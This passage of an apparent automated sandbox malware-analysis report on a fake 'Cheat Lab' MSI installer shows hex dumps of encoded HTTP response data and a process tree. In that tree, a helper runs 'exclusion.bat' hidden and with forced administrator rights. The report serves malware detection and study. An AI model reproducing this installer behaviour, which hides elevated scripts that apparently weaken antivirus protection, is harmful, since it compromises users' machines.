                                                                                                                                                                      Data Ascii: f,b3,5b,c3,b0,63,cb,ca,71,a9,8b,83,ca,b1,5a,e8,87,43,a3,85,60,d3,9a,74,c9,8c,47,aa,b4,52,c0,94,5d,dc,92,61,dc,b6,69,d8,a7,47,b5,d6,69,dd,90,86,b3,78,41,b2,b4,72,c5,a7,67,b7,7e,48,e1,89,5e,a2,b1,7b,bd,b5,7a,c5,bf,76,d3,9a,53,e4,9f,7c,bb,ba,52,a4,78,50,c1,a
                                                                                                                                                                      2023-11-06 14:35:16 UTC735INData Raw: 35 39 2c 31 33 35 2c 31 32 62 2c 31 35 34 2c 31 33 64 2c 31 33 33 2c 31 35 32 2c 31 35 33 2c 31 32 36 2c 31 32 64 2c 31 34 64 2c 31 34 33 2c 31 35 36 2c 31 33 32 2c 31 36 38 2c 31 32 64 2c 31 32 33 2c 31 30 62 2c 31 31 61 2c 31 33 61 2c 31 34 63 2c 31 33 65 2c 31 34 65 2c 31 34 31 2c 31 32 65 2c 31 32 39 2c 31 32 34 2c 31 35 39 2c 31 31 63 2c 31 33 37 2c 31 31 61 2c 31 33 37 2c 31 34 35 2c 31 32 35 2c 31 33 65 2c 31 35 63 2c 31 34 33 2c 31 34 39 2c 31 34 30 2c 31 34 62 2c 31 32 33 2c 31 33 35 2c 31 36 34 2c 31 33 33 2c 31 34 64 2c 62 63 2c 62 62 2c 31 31 65 2c 62 30 2c 31 32 33 2c 62 61 2c 31 34 32 2c 65 30 2c 31 34 36 2c 65 65 2c 31 34 39 2c 64 32 2c 31 32 39 2c 62 64 2c 31 36 31 2c 63 66 2c 31 34 30 2c 66 34 2c 31 33 66 2c 66 39 2c 31 33 64 2c 64 37 2c
                                                                                                                                                                      Data Ascii: 59,135,12b,154,13d,133,152,153,126,12d,14d,143,156,132,168,12d,123,10b,11a,13a,14c,13e,14e,141,12e,129,124,159,11c,137,11a,137,145,125,13e,15c,143,149,140,14b,123,135,164,133,14d,bc,bb,11e,b0,123,ba,142,e0,146,ee,149,d2,129,bd,161,cf,140,f4,13f,f9,13d,d7,
                                                                                                                                                                      2023-11-06 14:35:16 UTC751INData Raw: 66 2c 63 66 2c 64 34 2c 31 30 32 2c 64 65 2c 66 61 2c 64 61 2c 64 34 2c 65 61 2c 65 31 2c 65 32 2c 65 61 2c 65 63 2c 31 30 39 2c 63 31 2c 66 36 2c 31 32 62 2c 65 37 2c 64 34 2c 66 66 2c 64 31 2c 62 64 2c 31 30 33 2c 62 66 2c 64 39 2c 66 30 2c 65 31 2c 31 33 36 2c 65 30 2c 63 33 2c 31 30 39 2c 63 31 2c 65 65 2c 31 31 34 2c 64 30 2c 62 36 2c 64 65 2c 66 61 2c 64 38 2c 64 66 2c 31 33 63 2c 64 36 2c 64 64 2c 31 32 61 2c 31 35 33 2c 31 32 39 2c 31 30 38 2c 31 36 34 2c 31 34 62 2c 31 33 36 2c 65 39 2c 66 38 2c 63 66 2c 63 32 2c 62 61 2c 63 63 2c 64 39 2c 65 66 2c 64 33 2c 31 33 36 2c 64 35 2c 63 66 2c 63 34 2c 31 30 61 2c 66 30 2c 62 66 2c 64 66 2c 62 36 2c 64 36 2c 65 39 2c 63 34 2c 31 32 33 2c 65 64 2c 64 66 2c 31 32 62 2c 65 34 2c 65 65 2c 62 31 2c 63 31 2c
                                                                                                                                                                      Data Ascii: f,cf,d4,102,de,fa,da,d4,ea,e1,e2,ea,ec,109,c1,f6,12b,e7,d4,ff,d1,bd,103,bf,d9,f0,e1,136,e0,c3,109,c1,ee,114,d0,b6,de,fa,d8,df,13c,d6,dd,12a,153,129,108,164,14b,136,e9,f8,cf,c2,ba,cc,d9,ef,d3,136,d5,cf,c4,10a,f0,bf,df,b6,d6,e9,c4,123,ed,df,12b,e4,ee,b1,c1,
                                                                                                                                                                      2023-11-06 14:35:16 UTC767INData Raw: 2c 31 32 39 2c 31 34 33 2c 31 33 33 2c 31 33 38 2c 31 31 38 2c 31 33 64 2c 31 34 62 2c 62 63 2c 65 62 2c 31 34 61 2c 63 34 2c 65 37 2c 31 35 30 2c 31 33 65 2c 31 31 37 2c 31 31 34 2c 31 36 33 2c 31 33 39 2c 64 64 2c 64 38 2c 31 36 36 2c 31 32 33 2c 31 31 35 2c 31 32 32 2c 31 33 30 2c 31 34 30 2c 31 33 66 2c 31 33 34 2c 31 31 31 2c 31 34 38 2c 31 31 39 2c 31 32 39 2c 31 31 35 2c 31 34 66 2c 31 31 33 2c 31 33 65 2c 31 30 34 2c 31 33 66 2c 31 35 62 2c 31 33 38 2c 31 33 39 2c 31 35 62 2c 31 33 33 2c 63 61 2c 66 34 2c 31 34 36 2c 31 32 32 2c 31 32 66 2c 31 34 38 2c 31 33 39 2c 64 62 2c 63 37 2c 31 36 30 2c 31 32 32 2c 61 32 2c 61 65 2c 31 33 30 2c 31 33 34 2c 31 35 32 2c 31 34 30 2c 31 33 36 2c 31 34 39 2c 31 31 61 2c 31 31 37 2c 61 37 2c 65 63 2c 31 32 62 2c
                                                                                                                                                                      Data Ascii: ,129,143,133,138,118,13d,14b,bc,eb,14a,c4,e7,150,13e,117,114,163,139,dd,d8,166,123,115,122,130,140,13f,134,111,148,119,129,115,14f,113,13e,104,13f,15b,138,139,15b,133,ca,f4,146,122,12f,148,139,db,c7,160,122,a2,ae,130,134,152,140,136,149,11a,117,a7,ec,12b,
                                                                                                                                                                      2023-11-06 14:35:16 UTC783INData Raw: 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31
                                                                                                                                                                      Data Ascii: 8,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,1
                                                                                                                                                                      2023-11-06 14:35:16 UTC799INData Raw: 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c 64 66 2c 66 63 2c 31 35 65 2c 37 65 2c 31 30 30 2c 31 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32 32 2c 31 30 38 2c 31 35 66 2c 37 64 2c 31 32 35 2c 66 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 38 37 2c 31 31 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c 64 66 2c 66 63 2c 31 35 65 2c 37 65 2c 31 30 30 2c 31 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32 32 2c 31 30 38 2c 31 35 66 2c 37 64 2c 31 32 35 2c 66 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 38 37 2c 31 31 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c
                                                                                                                                                                      Data Ascii: 3,106,138,6a,e7,11e,135,81,df,fc,15e,7e,100,119,146,8c,115,110,12a,76,122,108,15f,7d,125,f1,126,64,ef,ff,155,87,113,106,138,6a,e7,11e,135,81,df,fc,15e,7e,100,119,146,8c,115,110,12a,76,122,108,15f,7d,125,f1,126,64,ef,ff,155,87,113,106,138,6a,e7,11e,135,81,
                                                                                                                                                                      2023-11-06 14:35:16 UTC815INData Raw: 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34
                                                                                                                                                                      Data Ascii: e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,14
                                                                                                                                                                      2023-11-06 14:35:16 UTC823INData Raw: 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c
                                                                                                                                                                      Data Ascii: 1,126,64,ef,ff,155,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,
                                                                                                                                                                      2023-11-06 14:35:16 UTC839INData Raw: 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33
                                                                                                                                                                      Data Ascii: ,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,13
                                                                                                                                                                      2023-11-06 14:35:16 UTC855INData Raw: 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65 2c 31 33 65 2c 66 36 2c 31 31 31 2c 31 34 36 2c 31 34 63 2c 31 30 62 2c 31 30 38 2c 31 32 61 2c 31 33 36 2c 31 31 38 2c 31 30 30 2c 31 35 66 2c 31 33 64 2c 31 31 62 2c 65 39 2c 31 32 36 2c 31 32 34 2c 65 35 2c 66 37 2c 31 35 35 2c 31 34 37 2c 31 30 39 2c 66 65 2c 31 33 38 2c 31 32 61 2c 64 64 2c 31 31 36 2c 31 33 35 2c 31 34 31 2c 64 35 2c 66 34 2c 31 35 65
                                                                                                                                                                      Data Ascii: 5,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e,13e,f6,111,146,14c,10b,108,12a,136,118,100,15f,13d,11b,e9,126,124,e5,f7,155,147,109,fe,138,12a,dd,116,135,141,d5,f4,15e
                                                                                                                                                                      2023-11-06 14:35:16 UTC871INData Raw: 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32 32 2c 31 30 38 2c 31 35 66 2c 37 64 2c 31 32 35 2c 66 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 38 37 2c 31 31 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c 64 66 2c 66 63 2c 31 35 65 2c 37 65 2c 31 30 30 2c 31 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32 32 2c 31 30 38 2c 31 35 66 2c 37 64 2c 31 32 35 2c 66 31 2c 31 32 36 2c 36 34 2c 65 66 2c 66 66 2c 31 35 35 2c 38 37 2c 31 31 33 2c 31 30 36 2c 31 33 38 2c 36 61 2c 65 37 2c 31 31 65 2c 31 33 35 2c 38 31 2c 64 66 2c 66 63 2c 31 35 65 2c 37 65 2c 31 30 30 2c 31 31 39 2c 31 34 36 2c 38 63 2c 31 31 35 2c 31 31 30 2c 31 32 61 2c 37 36 2c 31 32
                                                                                                                                                                      Data Ascii: 19,146,8c,115,110,12a,76,122,108,15f,7d,125,f1,126,64,ef,ff,155,87,113,106,138,6a,e7,11e,135,81,df,fc,15e,7e,100,119,146,8c,115,110,12a,76,122,108,15f,7d,125,f1,126,64,ef,ff,155,87,113,106,138,6a,e7,11e,135,81,df,fc,15e,7e,100,119,146,8c,115,110,12a,76,12
                                                                                                                                                                      2023-11-06 14:35:16 UTC887INData Raw: 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 38 2c 36 36 2c 31 30 35 2c 31 35 65 2c 31 34 35 2c 38 37 2c 31 32 32 2c 31 34 36 2c 31 35 33 2c 39 63 2c 31 31 39 2c 31 32 61 2c 31 33 64 2c 61 39 2c 31 31 31 2c 31 35 66 2c 31 34 34 2c 61 63 2c 66 61 2c 31 32 36 2c 31 32 62 2c 37 36 2c 31 30 38 2c 31 35 35 2c 31 34 65 2c 39 61 2c 31 30 66 2c 31 33 38 2c 31 33 31 2c 36 65 2c 31 32 37 2c 31 33 35 2c 31 34 38 2c 36 36 2c 31 30 35 2c 31 35 65 2c 31 34 35 2c 38 37
                                                                                                                                                                      Data Ascii: 5d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,148,66,105,15e,145,87,122,146,153,9c,119,12a,13d,a9,111,15f,144,ac,fa,126,12b,76,108,155,14e,9a,10f,138,131,6e,127,135,148,66,105,15e,145,87
                                                                                                                                                                      2023-11-06 14:35:16 UTC903INData Raw: 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33
                                                                                                                                                                      Data Ascii: 132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123
                                                                                                                                                                      2023-11-06 14:35:16 UTC919INData Raw: 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33
                                                                                                                                                                      Data Ascii: 132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,129,12a,161,134,140,122,13f,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123
                                                                                                                                                                      2023-11-06 14:35:16 UTC935INData Raw: 34 2c 64 36 2c 31 35 36 2c 64 61 2c 31 33 37 2c 62 37 2c 31 32 61 2c 31 30 30 2c 31 33 34 2c 63 63 2c 31 32 32 2c 64 36 2c 31 35 64 2c 63 65 2c 31 34 33 2c 65 65 2c 31 34 35 2c 31 32 62 2c 31 35 38 2c 31 31 30 2c 31 32 39 2c 63 36 2c 31 36 35 2c 64 62 2c 31 35 65 2c 63 33 2c 31 36 38 2c 63 32 2c 31 32 35 2c 62 61 2c 31 33 32 2c 64 62 2c 31 35 34 2c 64 65 2c 31 35 36 2c 64 35 2c 31 33 37 2c 31 30 39 2c 31 32 61 2c 62 38 2c 31 33 34 2c 31 32 30 2c 31 32 32 2c 31 31 66 2c 31 35 64 2c 31 30 62 2c 31 34 33 2c 31 32 63 2c 31 34 35 2c 31 31 39 2c 31 35 38 2c 31 32 32 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 31 32 2c 31 36 38 2c 31 33 33 2c 31 32 35 2c 31 32 32 2c 31 33 32 2c 66 36 2c 31 35 34 2c 65 31 2c 31 35 36 2c 65 32 2c 31 33 37 2c
                                                                                                                                                                      Data Ascii: 4,d6,156,da,137,b7,12a,100,134,cc,122,d6,15d,ce,143,ee,145,12b,158,110,129,c6,165,db,15e,c3,168,c2,125,ba,132,db,154,de,156,d5,137,109,12a,b8,134,120,122,11f,15d,10b,143,12c,145,119,158,122,129,135,165,14b,15e,112,168,133,125,122,132,f6,154,e1,156,e2,137,
                                                                                                                                                                      2023-11-06 14:35:16 UTC951INData Raw: 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 38 33 2c 37 65 2c 63 32 2c 39 31 2c 39 34 2c 37 64 2c 38 31 2c 39 65 2c 37 61 2c 62 36 2c 64 37 2c 63 30 2c 35 61 2c 65 35 2c 36 35 2c 38 66 2c 61 35 2c 64 64 2c 63 65 2c 62 33 2c 62 61 2c 65 39 2c 39 36 2c 39 64 2c 61 30 2c 61 38 2c 62 64 2c 63 38 2c 61 34 2c 63 37 2c 63 32 2c 61 62 2c 39 62 2c 61 64 2c 37 30 2c 38 35 2c 35 32 2c 38 34 2c 62 61 2c 64
                                                                                                                                                                      Data Ascii: a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,38,39,70,43,4f,31,4e,6c,4c,52,6b,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,32,41,51,63,55,65,58,46,83,7e,c2,91,94,7d,81,9e,7a,b6,d7,c0,5a,e5,65,8f,a5,dd,ce,b3,ba,e9,96,9d,a0,a8,bd,c8,a4,c7,c2,ab,9b,ad,70,85,52,84,ba,d


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:15:34:57
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi"
                                                                                                                                                                      Imagebase:0x7ff60c680000
                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:15:34:57
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                      Imagebase:0x7ff60c680000
                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:15:34:57
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F46D88023010FA67F9BE0B7659EC2472 C
                                                                                                                                                                      Imagebase:0xdc0000
                                                                                                                                                                      File size:59'904 bytes
                                                                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:15:35:02
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding CF599F91F9CA52D79045F3DD2E6AB85B
                                                                                                                                                                      Imagebase:0xdc0000
                                                                                                                                                                      File size:59'904 bytes
                                                                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:15:35:02
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 2387AF9F5B3315EE543DBCEF741FA41F E Global\MSI0000
                                                                                                                                                                      Imagebase:0xdc0000
                                                                                                                                                                      File size:59'904 bytes
                                                                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:15:35:03
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\Installer\MSIC01A.tmp
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Installer\MSIC01A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat
                                                                                                                                                                      Imagebase:0xf30000
                                                                                                                                                                      File size:399'328 bytes
                                                                                                                                                                      MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:15:35:03
                                                                                                                                                                      Start date:06/11/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
